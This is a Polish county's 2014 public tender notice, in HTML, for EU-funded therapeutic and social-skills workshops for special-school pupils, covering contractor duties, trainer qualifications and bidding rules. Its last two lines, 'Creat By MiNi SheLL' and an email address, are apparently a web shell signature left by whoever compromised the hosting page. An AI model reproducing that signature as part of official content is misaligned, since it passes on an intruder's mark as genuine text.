13. Rozumiemy swoje i cudze uczucie. Jesteśmy asertywni. Nauczenie rozpoznawania uczuć przeżywanych w różnych sytuacjach oraz ich ujawniania. Uświadamianie sobie swoich uczuć. Nauka akceptowania uczuć przeżywanych przez inne osoby. Wdrażanie do respektowania różnic w uczuciach, które budzą w ludziach te same rzeczy. Zdobycie  podstawowych wiadomości o postawie asertywnej. Rozwijanie umiejętności zachowań asertywnych. Doskonalenie umiejętności rozróżniania postaw asertywnych, agresywnych i uległych. Doskonalenie umiejętności asertywnego inicjowania kontaktów rówieśniczych.
14. Radzenie sobie ze stresem. rozwijanie umiejętności radzenia sobie z napięciem pojawiającym się w trudnych sytuacjach, rozpoznawanie oznak stresu, rozwijanie umiejętności radzenia sobie ze stresem, przybliżenie znaczenia pozytywnego myślenia, poznanie metod relaksacji.
Osiągnięcia uczniów w wyniku przeprowadzonych warsztatów:
1. Poszerzenie wiadomości ma temat aktywności zawodowej oraz życiowej.
2. Wzrost umiejętności społecznych potrzebnych w pracy i w życiu.
3. Rozwijanie umiejętności rozumienia sytuacji społecznych i adekwatnego dostosowywania się do wymogów społecznych.
4. Poszerzenie świadomości na temat sytuacji osoby niepełnosprawnej w rodzinie, wśród znajomych i nieznajomych osób. 
5. Uwrażliwienie na własne potrzeby społeczne, na zależność od innych i ograniczanie 
w autonomii.
6. Wzrost motywacji do poszukiwania obszarów własnej niezależności.
Realizacja tematyki musi odbywać się z wykorzystaniem prostego języka, w razie potrzeby z wykorzystaniem elementów komunikacji alternatywnej lub wspomagającej. 
Formy i metody pracy terapeutycznej:
- praca w grupie;
- praca w parach;
- praca indywidualna; 
- system wzmocnień dostosowany do indywidualnych potrzeb każdego uczestnika zajęć;
- ćwiczenia i zabawy integracyjne, psychodrama, burza mózgów, swobodna ekspresja słowna, scenki, dyskusja, burza mózgów; elementy W. Sherborne, B. Strauss; 
- elementy ruchowo - gimnastyczne; 
- elementy: makaton, gesty, symbole;

Środki dydaktyczne, co najmniej: 
- arkusze papieru, bloki, pisaki, kredki, farby, długopisy, piłka, szarfy, woreczki, gry planszowe, plakaty, zdjęcia twarzy wyrażające różne emocje, blankiety do wypełniania

1.1.3 Obowiązki Wykonawcy:

Do obowiązków Wykonawcy należy przede wszystkim:
a. w ramach promocji przedmiotu umowy Wykonawca zobowiązany jest do:
oznakowania sal/przestrzeni, w których będą odbywały się zajęcia, zgodnie z zasadami oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki,
oznaczania wszelkich dokumentów wytworzonych w czasie realizacji przedmiotu zamówienia, zgodnie z zasadami POKL, wzór papieru firmowego zostanie udostępniony przez Zamawiającego niezwłocznie po podpisaniu umowy.
b. zapewnienie materiałów szkoleniowych, pomocy dydaktycznych (na każdym wyjeździe dla 14 osób) w formie:  arkusze papieru, bloki, pisaki, kredki, farby, długopisy, piłka, szarfy, woreczki, gry planszowe, plakaty, zdjęcia twarzy wyrażające różne emocje, blankiety do wypełniania.
c. prowadzenie dokumentacji projektowej, list obecności, dziennika zajęć.
d. opracowanie i przeprowadzenie ankiet ewaluacyjnych oraz sporządzenie raportu wyników.
e. Wykonawca przedstawi po zakończeniu zajęć  Zamawiającemu sprawozdanie z realizacji programu zajęć oraz dziennik zajęć.
Każdy z opiekunów w ramach świadczenia usługi zobowiązany jest do:
sprawowania opieki nad 7 uczestnikami warsztatów w czasie przejazdu tam i z powrotem, w trakcie trwania warsztatów wyjazdowych, przerw w zajęciach, posiłków, w szczególności pomocy w czynnościach samoobsługowych;
organizowanie czasu wolnego dla uczestników warsztatów w formie spacerów, rozmów z opiekunami, organizowania spotkań koleżeńskich;
dokonania ewaluacji i przygotowania raportu z ewaluacji w formie pisemnej po zakończeniu realizacji przedmiotu zamówienia: ankiet ewaluacyjnych z raportem wyników (opinia ucznia w dniu rozpoczęcia zajęć oraz po ich zakończeniu, opis zachowania ucznia podczas zajęć). Wzory ankiet i raportów powinny zostać uzgodnione z Koordynatorem Projektu wskazanym przez Zamawiającego
dbania o właściwe oznaczenie wszelkich materiałów wytworzonych w czasie realizacji przedmiotu zamówienia, zgodnie z zasadami POKL;
wykonanie dokumentacji fotograficznej warsztatów;
postępowania zgodnie z zasadami bezpieczeństwa i sprawowania nadzoru nad przestrzeganiem tych zasad przez uczniów w czasie sprawowania opieki..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.60.00.00-9, 80.41.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie opisuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie opisuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie opisuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponuje:
- minimum dwoma  trenerami/coachami z następującymi kwalifikacjami:   
a) z wykształceniem wyższym magisterskim pedagogicznym lub
b) z wykształceniem wyższym magisterskim z przygotowaniem pedagogicznym lub
c) z wykształceniem wyższym magisterskim psychologicznym lub
d) z wykształceniem wyższym magisterskim i kursem lub szkoleniem lub studiami podyplomowymi lub studiami wyższymi z zakresu coachingu;
- minimum jednym trenerem/ coacham z następującymi kwalifikacjami:
a) z wykształceniem wyższym magisterskim pedagogicznym lub
b) z wykształceniem wyższym magisterskim z przygotowaniem pedagogicznym lub
c) z wykształceniem wyższym magisterskim psychologicznym lub
d) z wykształceniem wyższym magisterskim i kursem lub szkoleniem lub studiami podyplomowymi lub studiami wyższymi z zakresu coachingu,
oraz posiadającym kwalifikacje  kierownika wypoczynku zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 21 stycznia 1997 r. w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania; Wykonawca łącznie musi dyspopnować minimum trzema   trenerami/coachami.
- Dysponuje  minimum dwoma osobami/opiekunami z następującymi kwalifikacjami:
a)wykształcenie wyższe pedagogiczne i kurs kwalifikacyjny lub studia podyplomowe z zakresu oligofrenopedagogiki lub
b)  wykształcenie wyższe pedagogiczne o kierunku pedagogika specjalna albo oligofrenopedagogika
oraz posidać co najmniej 3-letni staż w zawodzie nauczyciela w szkole specjalnej dla uczniów z niepełnosprawnością intelektualną lub ruchową,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie opisuje tego warunku.
Zgodnie z art. 26 ust. 2b ustawy Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 

II. Inne warunki udziału w postępowaniu .
1. Brak podstaw do wykluczenia wykonawcy z powodu niespełnienia warunków, o których mowa w art.24 ust.1 ustawy Prawo Zamówien Publicznych.
2.Brak podstaw do wykluczenia wykonawców na podstawie art.24 ust.2 pkt.5 ustawy Prawo Zamówień Publicznych tj., którzy należąc do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. Nr 50, poz. 331, z późn. zm.), złożyli odrębne oferty w tym samym postępowaniu, chyba, że wykażą, że istniejące między nimi powiązania nie prowadzą do zachwiania uczciwej konkurencji pomiędzy wykonawcami w postępowaniu o udzielenie zamówienia. 
Ocena spełniania poszczególnych warunków  przez Wykonawców zostanie dokonana na podstawie  złożonej oferty oraz złożonych przez wykonawców oświadczeń i dokumentów, wymaganych przez Zamawiającego w SIWZ i zostanie przeprowadzona zgodnie z formułą - spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1). wypełniony i podpisany formularz ofertowy stanowiący zał. nr 1  do SIWZ;
2) Jeżeli oferta podpisana jest przez osobę inną niż upoważniona do reprezentowania wykonawcy do oferty należy załączyć pełnomocnictwo (upoważnienie)w formie oryginału podpisane przez osoby uprawnione do reprezentowania wykonawcy lub w formie kopii poświadczonej notarialnie.
3) w przypadku wykonawców wspólnie ubiegających się o udzialenia zamówienia pełnomocnictwo/upoważnieniem dla pełnomocnika wykonawców występujących wspólnie do reprezentowania ich w postępowaniu o udzielenie zamówienia  albo reprezentowania w postępowaniu i zawarcia umowy  w sprawie zamówienia publicznego.Pełnomocnictwo musi być w formie oryginału lub w formie kopii poświadczonej notarialnie. 
4) w przypadku gdy Wykonawca polega na wiedzy i doświadczeniu , osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów Wykonawca zobowiązany jest do przedstawienia pisemnego zobowiązania tych podmiotów ( np. pisemne oświadczenie podmiotu trzeciego, umowa przedwstępna, umowa generalna o współpracy ) do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.Zobowiązanie musi zawierać minimum: 
- dane pozwalające na identyfikację stron; 
- zakres udostępniania; 
- sposób wykorzystania zasobów innego podmiotu przez wykonawcę; 
- zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia;
- charakter stosunku jaki będzie łączył wykonawcę z innym podmiotem;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W związku z art. 144 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień (tekst jednolity: Dz. U. z dnia 09.08.2013 roku, poz.907) Zamawiający przewiduje możliwość zmiany istotnych postanowień Umowy w stosunku do treści Oferty, w następujących okolicznościach:
1. konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia Umowy,
2. gdy zmiana postanowień umownych jest korzystna dla Zamawiającego,
3. w przypadku gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych lub zaleceń Instytucji, która przyznała środki na współfinansowanie zamówienia na usługę.
4. w przypadku wystąpienia siły wyższej. Siła wyższa oznacza wydarzenie zewnętrzne, nieprzewidywalne i poza kontrolą stron niniejszej umowy, którego skutkom nie można zapobiec, występujące po podpisaniu umowy, a powodujące niemożliwość wywiązania się z umowy w jej obecnym brzmieniu,
5. w przypadku zmiany stanu prawnego, który będzie wnosił nowe wymagania co do sposobu realizacji jakiegokolwiek elementu usług,
6. zmiany w kolejności i terminach wykonania przedmiotu zamówienia, na skutek zdarzeń losowych lub innych okoliczności,
7. zmiana osób odpowiedzialnych za wykonanie zadania ze strony Wykonawcy i Zamawiającego, która może nastąpić tylko na podstawie obiektywnych przesłanek zaakceptowanych przez Zamawiającego,
8. zmiana składu osobowego zespołu osób prowadzących zajęcia, a w szczególności dodanie nowych osób lub zamiana na inne osoby pod warunkiem, że nowe osoby będą posiadały kwalifikacje i doświadczenie nie niższe niż odpowiednie wymagania określone w SIWZ; zmiana może nastąpić tylko na podstawie obiektywnych przesłanek zaakceptowanych przez Zamawiającego.
9. zmiany harmonogramu realizacji przedmiotu umowy na skutek zdarzeń losowych lub innych okoliczności,
10. zmiana lub rezygnacja z podwykonawcy na etapie realizacji przedmiotu umowy z zastrzeżeniem § 8 ust. 3 i 4
11. zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.mikolowski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Mikołowie, ul.Żwirki i Wigury 4a,43-190 Mikołów,wejście B,parter,Biuro Podawcze, osobiście lub za zaliczeniem pocztowym,cena 5 PLN plus koszt wysyłki..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.06.2014 godzina 10:00, miejsce: Starostwo Powiatowe w Mikołowie, ul.Żwirki i Wigury 4a,43-190 Mikołów,wejście B,parter,kancelaria - pokój nr 127..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 19.07.2014.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn.: Kompleksowa Edukacja Specjalna - Program Rozwoju Szkół Specjalnych Powiatu Mikołowskiego jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com